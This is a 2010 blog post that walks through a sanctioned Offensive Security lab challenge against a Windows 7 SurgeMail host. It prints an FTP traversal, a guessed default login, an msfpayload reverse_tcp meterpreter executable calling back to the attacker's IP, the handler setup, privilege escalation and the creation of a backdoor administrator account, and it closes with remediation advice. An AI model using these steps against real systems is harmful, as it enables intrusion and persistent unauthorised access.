Monday, May 10, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for anouther challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.

Killthen00b
Ghost

After a quick portscan I chose to attack killthen00b purely based on the amount of open ports available on the system. Ghost provided port HTTP only. KilltheN00b had various ports open including FTP, HTTP and some various mail ports.

Scan output:
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  tcpwrapped
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  tcpwrapped
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped



More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when things get rough


Initial FTP probing:
First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasnt much to play with in any  available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So i decided to directly call the root directory with "cd c:". 

Score

Cd C:  correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login  the accessibility options would become a shell. But unfortunately I didnt have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.

HTTP:
Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

Also i noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting...

I then checked the exploit databases and verified an exploit for the version of surgemail running that was valid for windows 2000 and 2003.

Debugging:
 Next I decided to check the remote desktop port to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work.  This was a

TOTAL FAIL

I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP after a bit of wrestling with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or its protection mechanisms i only had control of certain parts of the stack but no EIP overwrite. To be correct, rather partial overwrite of EIP in this exploit which utilized the OS already providing a zero byte on the first byte of the 4 byte EIP to bypass filters on insertion the overflow utilized what was already present, (I like that) otherwise our null stop execution of the program prematurely.

Before going further with this I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:
 I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106.  The found login worked,

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with it for a few hours. 

Back to FTP:
After noticing the EXE files with a possible execution on the webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working and after a few iterations got me to the root directory. I browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into explotation mode.


Meterpreter Evil.exe:
I now i needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.142 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.6.142,LPORT=4444

Now we have our test shell to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe


Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!!  Very important that all the bases are covered in information security..


Offensive Security in depth!!!  or something like that.. (Wishful thinking)

So i started a multihandler for metasploit first, just in case the reverseshell worked.
msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.6.142
LHOST => 192.168.6.142
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.142:4444
[*] Starting the payload handler...
                                     
I then proceded to browse to the directory with all bodyparts crossed.....Hoping for connect back

SCORE!!!!!

My connection status in metasploit then indicated i had an open session.  :)

Post Explotation:
With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of charactors the LM hashes were blank.  So I decided to just create my own user using the following scenerio.

Get higher privilages:
meterpreter > getsystem
...got system (via technique 1).


Add a new domain admin:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host 127.0.0.1
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host 127.0.0.1
[+] Successfully added user to local group

But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into window with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??

Get a Remote Desktop Gui:
meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host 127.0.0.1
[+] Successfully added user to local group

SCORE I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :)  and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total.  Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise



Lessons Learned:
-Dont listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!

Remediation:
-Check the ACL's and the Jails on your FTP servers and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach externally :) Dont forget to add redbull and sourpatch kids to the budget!!!  They are ESSENTIAL to my findings.


Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG)  nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..


Up next:  Part 3
Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!! 



No comments:

Post a Comment

Learning Binary Ninja For Reverse Engineering and Scripting

 Recently added a new playlist with about 1.5 hours of Binary Ninja Content so far..    Video 1: I put this out a couple months ago covering...